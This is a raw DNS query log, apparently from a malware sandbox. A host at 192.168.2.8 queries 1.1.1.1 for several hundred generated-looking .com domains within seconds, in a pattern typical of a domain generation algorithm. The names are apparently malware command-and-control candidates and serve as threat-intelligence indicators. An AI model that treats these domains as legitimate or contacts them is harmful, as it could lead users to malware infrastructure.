                                                                                                                                                                                                          Nov 11, 2024 18:24:26.807336092 CET192.168.2.81.1.1.10x2f49Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.807679892 CET192.168.2.81.1.1.10x3d6aStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.807992935 CET192.168.2.81.1.1.10x75a8Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.808087111 CET192.168.2.81.1.1.10x6581Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.810677052 CET192.168.2.81.1.1.10x63a9Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.814362049 CET192.168.2.81.1.1.10x21b2Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.819195032 CET192.168.2.81.1.1.10xdf63Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.819401026 CET192.168.2.81.1.1.10xe070Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.840085983 CET192.168.2.81.1.1.10x1bbStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.840430021 CET192.168.2.81.1.1.10xb5d7Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.840838909 CET192.168.2.81.1.1.10x3831Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841125965 CET192.168.2.81.1.1.10x5204Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841300011 CET192.168.2.81.1.1.10x16aaStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841455936 CET192.168.2.81.1.1.10x3478Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841599941 CET192.168.2.81.1.1.10x33c7Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.841794014 CET192.168.2.81.1.1.10x4c2fStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.842164040 CET192.168.2.81.1.1.10x871aStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.847070932 CET192.168.2.81.1.1.10x9188Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.847482920 CET192.168.2.81.1.1.10xcf59Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.847930908 CET192.168.2.81.1.1.10xccaStandard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.850229025 CET192.168.2.81.1.1.10x9396Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857214928 CET192.168.2.81.1.1.10x1afeStandard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857395887 CET192.168.2.81.1.1.10x764Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857667923 CET192.168.2.81.1.1.10x9321Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857764959 CET192.168.2.81.1.1.10xea35Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.857969999 CET192.168.2.81.1.1.10x98f2Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.858174086 CET192.168.2.81.1.1.10x3020Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.859437943 CET192.168.2.81.1.1.10x1e63Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.859719038 CET192.168.2.81.1.1.10xd1fbStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.860219002 CET192.168.2.81.1.1.10x6aa9Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.860941887 CET192.168.2.81.1.1.10xa9ffStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861131907 CET192.168.2.81.1.1.10x6be4Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861314058 CET192.168.2.81.1.1.10xe1bbStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861457109 CET192.168.2.81.1.1.10x694aStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863250971 CET192.168.2.81.1.1.10x37c3Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863670111 CET192.168.2.81.1.1.10x4230Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863863945 CET192.168.2.81.1.1.10x2a84Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864259958 CET192.168.2.81.1.1.10xa6bfStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864383936 CET192.168.2.81.1.1.10xaf2cStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864654064 CET192.168.2.81.1.1.10x24dcStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.866213083 CET192.168.2.81.1.1.10xcd9dStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.866496086 CET192.168.2.81.1.1.10x6837Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.868582010 CET192.168.2.81.1.1.10xf7dbStandard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.871967077 CET192.168.2.81.1.1.10xf02eStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.875797987 CET192.168.2.81.1.1.10x6119Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.944689035 CET192.168.2.81.1.1.10x99bbStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.043806076 CET192.168.2.81.1.1.10xa4eeStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.044399977 CET192.168.2.81.1.1.10x432dStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.044576883 CET192.168.2.81.1.1.10x6ef4Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046649933 CET192.168.2.81.1.1.10xe174Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046806097 CET192.168.2.81.1.1.10x86d3Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046891928 CET192.168.2.81.1.1.10x6e01Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047094107 CET192.168.2.81.1.1.10x8218Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047094107 CET192.168.2.81.1.1.10x7e67Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047254086 CET192.168.2.81.1.1.10x463eStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047333956 CET192.168.2.81.1.1.10xf808Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047441959 CET192.168.2.81.1.1.10xe947Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047537088 CET192.168.2.81.1.1.10x63e7Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047617912 CET192.168.2.81.1.1.10xe382Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047755003 CET192.168.2.81.1.1.10x26beStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047786951 CET192.168.2.81.1.1.10x7326Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047974110 CET192.168.2.81.1.1.10x2bb8Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048012972 CET192.168.2.81.1.1.10xd9d9Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048141956 CET192.168.2.81.1.1.10x604eStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048202991 CET192.168.2.81.1.1.10xf18bStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048396111 CET192.168.2.81.1.1.10x73efStandard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048618078 CET192.168.2.81.1.1.10x1b5cStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048978090 CET192.168.2.81.1.1.10x47a4Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.050987005 CET192.168.2.81.1.1.10xce77Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051162958 CET192.168.2.81.1.1.10x31efStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051275015 CET192.168.2.81.1.1.10x71e9Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051564932 CET192.168.2.81.1.1.10x79c1Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051584005 CET192.168.2.81.1.1.10x1f37Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051897049 CET192.168.2.81.1.1.10xb867Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051975965 CET192.168.2.81.1.1.10xaf6bStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052220106 CET192.168.2.81.1.1.10xa1cfStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052289963 CET192.168.2.81.1.1.10x4fa0Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052506924 CET192.168.2.81.1.1.10xb419Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052766085 CET192.168.2.81.1.1.10x2c47Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053205013 CET192.168.2.81.1.1.10x3bfaStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053481102 CET192.168.2.81.1.1.10xedd9Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053569078 CET192.168.2.81.1.1.10xaabcStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053836107 CET192.168.2.81.1.1.10x36daStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.054820061 CET192.168.2.81.1.1.10x1016Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.055160046 CET192.168.2.81.1.1.10xacf3Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.057553053 CET192.168.2.81.1.1.10x9873Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.058624029 CET192.168.2.81.1.1.10x8b41Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.680341005 CET192.168.2.81.1.1.10xfe3bStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.142807961 CET192.168.2.81.1.1.10x696aStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.143104076 CET192.168.2.81.1.1.10x575aStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.144449949 CET192.168.2.81.1.1.10x27b2Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.145946980 CET192.168.2.81.1.1.10x591fStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.146138906 CET192.168.2.81.1.1.10x9349Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.147505045 CET192.168.2.81.1.1.10xf47eStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.150376081 CET192.168.2.81.1.1.10x1454Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.156861067 CET192.168.2.81.1.1.10x3ffdStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.162700891 CET192.168.2.81.1.1.10x2198Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.162729979 CET192.168.2.81.1.1.10x968bStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.163642883 CET192.168.2.81.1.1.10xf278Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.169131041 CET192.168.2.81.1.1.10x218aStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.169404984 CET192.168.2.81.1.1.10x9c88Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.173554897 CET192.168.2.81.1.1.10x8f8fStandard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.176326990 CET192.168.2.81.1.1.10x5314Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.180794954 CET192.168.2.81.1.1.10x94d9Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.181766033 CET192.168.2.81.1.1.10x7588Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.266525984 CET192.168.2.81.1.1.10x3c9aStandard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.267201900 CET192.168.2.81.1.1.10x59fStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.267688036 CET192.168.2.81.1.1.10xebd1Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.268639088 CET192.168.2.81.1.1.10xecb2Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.269359112 CET192.168.2.81.1.1.10xffedStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.269737005 CET192.168.2.81.1.1.10xffb7Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270389080 CET192.168.2.81.1.1.10x4c98Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270623922 CET192.168.2.81.1.1.10x2ccaStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270844936 CET192.168.2.81.1.1.10xf022Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.271014929 CET192.168.2.81.1.1.10x9c8eStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.271219015 CET192.168.2.81.1.1.10x138aStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.271672964 CET192.168.2.81.1.1.10xc996Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.271744013 CET192.168.2.81.1.1.10x87c9Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.272298098 CET192.168.2.81.1.1.10xc336Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.272603035 CET192.168.2.81.1.1.10x4a14Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.273133039 CET192.168.2.81.1.1.10x68f2Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.275228024 CET192.168.2.81.1.1.10x489fStandard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.296979904 CET192.168.2.81.1.1.10xfacaStandard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298160076 CET192.168.2.81.1.1.10x27a0Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298367977 CET192.168.2.81.1.1.10x1099Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298588037 CET192.168.2.81.1.1.10x15c4Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298660994 CET192.168.2.81.1.1.10xef21Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298768044 CET192.168.2.81.1.1.10x708cStandard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298887968 CET192.168.2.81.1.1.10x90fbStandard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.298981905 CET192.168.2.81.1.1.10xe266Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.299186945 CET192.168.2.81.1.1.10x4451Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.299186945 CET192.168.2.81.1.1.10x4346Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.299362898 CET192.168.2.81.1.1.10x36ceStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.301733971 CET192.168.2.81.1.1.10x9bb8Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.311569929 CET192.168.2.81.1.1.10x73f1Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.311758041 CET192.168.2.81.1.1.10x38afStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.312074900 CET192.168.2.81.1.1.10xf35aStandard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.313688040 CET192.168.2.81.1.1.10x1fe0Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.314276934 CET192.168.2.81.1.1.10xd027Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.314462900 CET192.168.2.81.1.1.10xfbbStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.314636946 CET192.168.2.81.1.1.10xbc93Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.314825058 CET192.168.2.81.1.1.10x6c94Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315205097 CET192.168.2.81.1.1.10xc438Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315289974 CET192.168.2.81.1.1.10x21efStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315557003 CET192.168.2.81.1.1.10x907cStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315795898 CET192.168.2.81.1.1.10x69d7Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.315874100 CET192.168.2.81.1.1.10xf30Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.971344948 CET192.168.2.81.1.1.10xe002Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.979661942 CET192.168.2.81.1.1.10xe52dStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.982217073 CET192.168.2.81.1.1.10x55a4Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.988823891 CET192.168.2.81.1.1.10xbad0Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.990531921 CET192.168.2.81.1.1.10x4131Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.996882915 CET192.168.2.81.1.1.10xcb49Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.003631115 CET192.168.2.81.1.1.10xd658Standard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.006232023 CET192.168.2.81.1.1.10x75afStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.006386042 CET192.168.2.81.1.1.10xea51Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.008105040 CET192.168.2.81.1.1.10x294Standard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.011660099 CET192.168.2.81.1.1.10x6889Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.012065887 CET192.168.2.81.1.1.10x625cStandard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.012470961 CET192.168.2.81.1.1.10x8161Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.012897015 CET192.168.2.81.1.1.10xec51Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.014065027 CET192.168.2.81.1.1.10x7df0Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.014422894 CET192.168.2.81.1.1.10x813Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.014925003 CET192.168.2.81.1.1.10x8eStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.015353918 CET192.168.2.81.1.1.10xec3dStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.015404940 CET192.168.2.81.1.1.10x337bStandard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.015990973 CET192.168.2.81.1.1.10x6783Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.016515017 CET192.168.2.81.1.1.10x7973Standard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.016710997 CET192.168.2.81.1.1.10x8b1Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.017134905 CET192.168.2.81.1.1.10x1266Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.017816067 CET192.168.2.81.1.1.10xe9eStandard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.018754959 CET192.168.2.81.1.1.10xb24dStandard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.019320011 CET192.168.2.81.1.1.10xa5dStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.019700050 CET192.168.2.81.1.1.10x707fStandard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.020265102 CET192.168.2.81.1.1.10xf68aStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.020632029 CET192.168.2.81.1.1.10x6274Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.021130085 CET192.168.2.81.1.1.10x35eeStandard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.021568060 CET192.168.2.81.1.1.10xa648Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.022106886 CET192.168.2.81.1.1.10xfb13Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.022517920 CET192.168.2.81.1.1.10xeef7Standard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.028678894 CET192.168.2.81.1.1.10xabfStandard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.033072948 CET192.168.2.81.1.1.10x9258Standard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.084429026 CET192.168.2.81.1.1.10x9e8bStandard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.085145950 CET192.168.2.81.1.1.10x6517Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
